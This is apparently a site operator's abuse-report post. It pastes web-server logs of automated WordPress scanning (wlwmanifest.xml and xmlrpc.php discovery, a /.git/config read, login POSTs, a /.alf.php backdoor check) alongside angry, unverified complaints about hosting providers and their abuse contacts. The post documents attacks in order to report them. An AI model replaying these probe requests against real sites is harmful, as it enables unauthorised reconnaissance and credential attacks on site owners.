149.88.106.173 website*x.com – – [16/Aug/2025:10:29:30 +0200] „GET /wp-includes/js/crop/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36“
149.88.106.173 website*x.com – – [16/Aug/2025:10:29:31 +0200] „GET /wp-content/languages/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36“
149.88.106.173 website*x.com – – [16/Aug/2025:10:29:31 +0200] „GET /wp-includes/css/dist/list-reusable-blocks/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36“
149.88.106.173 website*x.com – – [16/Aug/2025:10:29:31 +0200] „GET /wp-includes/Requests/src/Auth/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36“
149.88.106.173 website*x.com – – [16/Aug/2025:10:29:31 +0200] „GET /wp-admin/css/colors/midnight/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
149.88.106.173 website*x.com – – [16/Aug/2025:10:29:31 +0200] „GET /wp-admin/js/widgets/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
149.88.106.173 website*x.com – – [16/Aug/2025:10:29:31 +0200] „GET /wp-includes/blocks/site-logo/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0“
149.88.106.173 website*x.com – – [16/Aug/2025:10:29:32 +0200] „GET /wp-includes/Requests/Proxy/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0“
149.88.106.173 website*x.com – – [16/Aug/2025:10:29:32 +0200] „GET /wp-includes/Text/Diff/Engine/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0“
149.88.106.173 website*x.com – – [16/Aug/2025:10:29:32 +0200] „GET /wp-includes/SimplePie/Content/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
149.88.106.173 website*x.com – – [16/Aug/2025:10:29:32 +0200] „GET /wp-content/plugins/elementor/assets/images/app/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36“
149.88.106.173 website*x.com – – [16/Aug/2025:10:29:32 +0200] „GET /wp-includes/blocks/loginout/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0“
149.88.106.173 website*x.com – – [16/Aug/2025:10:29:32 +0200] „GET /.well-known/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
149.88.106.173 website*x.com – – [16/Aug/2025:10:29:33 +0200] „GET /wp-includes/l10n/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36“
149.88.106.173 website*x.com – – [16/Aug/2025:10:29:33 +0200] „GET /images/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36“
149.88.106.173 website*x.com – – [16/Aug/2025:10:29:33 +0200] „GET /wp-includes/css/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36“
149.88.106.173 website*x.com – – [16/Aug/2025:10:29:33 +0200] „GET /backup/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0“
149.88.106.173 website*x.com – – [16/Aug/2025:10:29:33 +0200] „GET /wp-admin/network/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0“
149.88.106.173 website*x.com – – [16/Aug/2025:10:29:34 +0200] „GET /wp/wp-content/themes/twentytwenty/template-parts/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36“
149.88.106.173 website*x.com – – [16/Aug/2025:10:29:34 +0200] „GET /wp-includes/SimplePie/Content/Type/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36“
149.88.106.173 website*x.com – – [16/Aug/2025:10:29:34 +0200] „GET /wp-admin/maint/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
149.88.106.173 website*x.com – – [16/Aug/2025:10:29:34 +0200] „GET /wp-admin/css/colors/blue/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
149.88.106.173 website*x.com – – [16/Aug/2025:10:29:34 +0200] „GET /wp-includes/images/smilies/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36“
149.88.106.173 website*x.com – – [16/Aug/2025:10:29:34 +0200] „GET /wp-includes/pomo/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36“
149.88.106.173 website*x.com – – [16/Aug/2025:10:29:35 +0200] „GET /wp-admin/js/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0“
149.88.106.173 website*x.com – – [16/Aug/2025:10:29:35 +0200] „GET /wp-includes/php-compat/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
149.88.106.173 website*x.com – – [16/Aug/2025:10:29:35 +0200] „GET /wp-includes/js/dist/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0“
149.88.106.173 website*x.com – – [16/Aug/2025:10:29:35 +0200] „GET /wp-includes/ID3/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
149.88.106.173 website*x.com – – [16/Aug/2025:10:29:35 +0200] „GET /wp-content/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0“
149.88.106.173 website*x.com – – [16/Aug/2025:10:29:35 +0200] „GET /wp-includes/blocks/latest-comments/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
149.88.106.173 website*x.com – – [16/Aug/2025:10:29:36 +0200] „GET /vendor/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
… and so on… and so on!!!

MAIL NR. 5 TODAY – Hacking-attempts from weekend!

report@abuseradar.com,abuse@cogentco.com,bucklog@proton.me,contact@proton.me, abuse@ipxo.com, abuse@contabo.de, noc@contabo.de, sascha.wintz@contabo.de

AS174 – Cogent Communications – VERY IGNORANT AND UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
report@abuseradar.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
151.240.205.179 www.website*x.com – – [16/Aug/2025:06:00:55 +0200] „GET //xmlrpc.php?rsd HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
151.240.205.179 www.website*x.com – – [16/Aug/2025:06:00:55 +0200] „GET //blog/wp-includes/wlwmanifest.xml HTTP/1.0“ 301 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
151.240.205.179 www.website*x.com – – [16/Aug/2025:06:00:56 +0200] „GET //web/wp-includes/wlwmanifest.xml HTTP/1.0“ 301 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
151.240.205.179 www.website*x.com – – [16/Aug/2025:06:00:56 +0200] „GET //wordpress/wp-includes/wlwmanifest.xml HTTP/1.0“ 301 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
151.240.205.179 www.website*x.com – – [16/Aug/2025:06:00:57 +0200] „GET //wp/wp-includes/wlwmanifest.xml HTTP/1.0“ 301 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
151.240.205.179 www.website*x.com – – [16/Aug/2025:06:00:57 +0200] „GET //2020/wp-includes/wlwmanifest.xml HTTP/1.0“ 301 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
151.240.205.179 www.website*x.com – – [16/Aug/2025:06:00:58 +0200] „GET //2019/wp-includes/wlwmanifest.xml HTTP/1.0“ 301 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
151.240.205.179 www.website*x.com – – [16/Aug/2025:06:00:58 +0200] „GET //2021/wp-includes/wlwmanifest.xml HTTP/1.0“ 301 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
151.240.205.179 www.website*x.com – – [16/Aug/2025:06:00:59 +0200] „GET //shop/wp-includes/wlwmanifest.xml HTTP/1.0“ 301 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
151.240.205.179 www.website*x.com – – [16/Aug/2025:06:01:00 +0200] „GET //wp1/wp-includes/wlwmanifest.xml HTTP/1.0“ 301 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
151.240.205.179 www.website*x.com – – [16/Aug/2025:06:01:00 +0200] „GET //test/wp-includes/wlwmanifest.xml HTTP/1.0“ 301 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
151.240.205.179 www.website*x.com – – [16/Aug/2025:06:01:01 +0200] „GET //site/wp-includes/wlwmanifest.xml HTTP/1.0“ 301 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
151.240.205.179 www.website*x.com – – [16/Aug/2025:06:01:01 +0200] „GET //cms/wp-includes/wlwmanifest.xml HTTP/1.0“ 301 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“

AS211590 – Bucklog SARL – VERY IGNORANT AND UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
bucklog@proton.me – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
185.177.72.24 website*x.com – – [17/Aug/2025:02:36:37 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 9; G8341) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36“

AS51167 – Contabo GmbH – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@contabo.de – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
173.249.59.196 www.website*x.com – – [17/Aug/2025:06:44:44 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0“
173.249.59.196 www.website*x.com – – [17/Aug/2025:06:44:44 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0“

MAIL NR. 6 TODAY – Hacking-attempts from weekend!

abuse@nybula.com,abuse@oracleemaildelivery.com,abuse@microsoft.com, msftcs@microsoft.com, cert@microsoft.com

AS401116 – Nybula LLC – VERY IGNORANT AND UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@nybula.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
196.251.114.219 website*x.com – – [16/Aug/2025:07:41:18 +0200] „GET /xmlrpc.php?rsd HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.114.219 website*x.com – – [16/Aug/2025:07:41:19 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.114.219 website*x.com – – [16/Aug/2025:07:41:19 +0200] „GET /blog/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.114.219 website*x.com – – [16/Aug/2025:07:41:19 +0200] „GET /web/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.114.219 website*x.com – – [16/Aug/2025:07:41:19 +0200] „GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.114.219 website*x.com – – [16/Aug/2025:07:41:19 +0200] „GET /website/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.114.219 website*x.com – – [16/Aug/2025:07:41:20 +0200] „GET /wp/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.114.219 website*x.com – – [16/Aug/2025:07:41:20 +0200] „GET /news/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.114.219 website*x.com – – [16/Aug/2025:07:41:20 +0200] „GET /2020/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.114.219 website*x.com – – [16/Aug/2025:07:41:20 +0200] „GET /2019/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.114.219 website*x.com – – [16/Aug/2025:07:41:20 +0200] „GET /shop/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.114.219 website*x.com – – [16/Aug/2025:07:41:20 +0200] „GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.114.219 website*x.com – – [16/Aug/2025:07:41:21 +0200] „GET /test/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.114.219 website*x.com – – [16/Aug/2025:07:41:21 +0200] „GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.114.219 website*x.com – – [16/Aug/2025:07:41:21 +0200] „GET /site/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.114.219 website*x.com – – [16/Aug/2025:07:41:21 +0200] „GET /cms/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.114.219 website*x.com – – [16/Aug/2025:07:41:22 +0200] „GET /sito/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“

AS31898 – Oracle Corporation – REFERRER-SPAM! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@oracleemaildelivery.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
141.148.153.213 website*x.com – – [16/Aug/2025:09:05:40 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1“
141.148.153.213 website*x.com – – [16/Aug/2025:09:05:42 +0200] „GET / HTTP/1.0“ 403 – „http://www.cosmoage.com/“ „Mozilla/5.0 (iPhone; CPU iPhone OS 16_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/15E148 Safari/604.1“
141.148.153.213 website*x.com – – [16/Aug/2025:09:05:45 +0200] „GET /favicon.ico HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (iPhone; CPU iPhone OS 16_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/15E148 Safari/604.1“
141.148.153.213 website*x.com – – [16/Aug/2025:09:05:48 +0200] „GET /favicon.ico HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1“

AS8075 – Microsoft Corporation – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@microsoft.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT! ABUSE PER EMAIL IS STANDARD!!!
52.169.222.36 website*x.com – – [16/Aug/2025:12:41:12 +0200] „GET /.alf.php HTTP/1.0“ 302 – „-“ „-“

MAIL NR. 7 TODAY – Hacking-attempts from weekend!

abuse@ovh.net,abuse@ovh.ca,abuse@ovh.us,abuse@microsoft.com, msftcs@microsoft.com,cert@microsoft.com

AS16276 – OVH SAS – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@ovh.net – ABUSE PER EMAIL IS STANDARD!!!
139.99.241.181 website*x.de – – [16/Aug/2025:08:47:06 +0200] „GET /wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
139.99.241.181 website*x.de – – [16/Aug/2025:08:47:06 +0200] „GET /xmlrpc.php?rsd HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
139.99.241.181 website*x.de – – [16/Aug/2025:08:47:06 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
139.99.241.181 website*x.de – – [16/Aug/2025:08:47:06 +0200] „GET /blog/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
139.99.241.181 website*x.de – – [16/Aug/2025:08:47:07 +0200] „GET /web/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
139.99.241.181 website*x.de – – [16/Aug/2025:08:47:07 +0200] „GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
139.99.241.181 website*x.de – – [16/Aug/2025:08:47:07 +0200] „GET /website/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
139.99.241.181 website*x.de – – [16/Aug/2025:08:47:07 +0200] „GET /wp/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
139.99.241.181 website*x.de – – [16/Aug/2025:08:47:08 +0200] „GET /news/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
139.99.241.181 website*x.de – – [16/Aug/2025:08:47:08 +0200] „GET /2020/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
139.99.241.181 website*x.de – – [16/Aug/2025:08:47:08 +0200] „GET /2019/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
139.99.241.181 website*x.de – – [16/Aug/2025:08:47:08 +0200] „GET /shop/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
139.99.241.181 website*x.de – – [16/Aug/2025:08:47:09 +0200] „GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
139.99.241.181 website*x.de – – [16/Aug/2025:08:47:09 +0200] „GET /test/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
139.99.241.181 website*x.de – – [16/Aug/2025:08:47:09 +0200] „GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
139.99.241.181 website*x.de – – [16/Aug/2025:08:47:10 +0200] „GET /site/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
139.99.241.181 website*x.de – – [16/Aug/2025:08:47:10 +0200] „GET /cms/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
139.99.241.181 website*x.de – – [16/Aug/2025:08:47:10 +0200] „GET /sito/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“

AS8075 – Microsoft Corporation – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@microsoft.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT! ABUSE PER EMAIL IS STANDARD!!!
135.220.170.14 website*x.de – – [16/Aug/2025:10:17:48 +0200] „GET /.alf.php HTTP/1.0“ 301 – „-“ „-“

MAIL NR. 8 TODAY – Hacking-attempts from weekend!

admin@serveroffer.lt, abuse@hosteurope.de,abuse@ptbsti.com

AS20773 – Host Europe GmbH – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@hosteurope.de – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
160.153.246.243 website*x.com – – [16/Aug/2025:11:10:14 +0200] „HEAD /wordpress HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
160.153.246.243 website*x.com – – [16/Aug/2025:11:11:44 +0200] „HEAD /Wordpress HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
160.153.246.243 website*x.com – – [16/Aug/2025:11:13:14 +0200] „HEAD /WORDPRESS HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
160.153.246.243 website*x.com – – [16/Aug/2025:11:14:30 +0200] „HEAD /WordPress HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
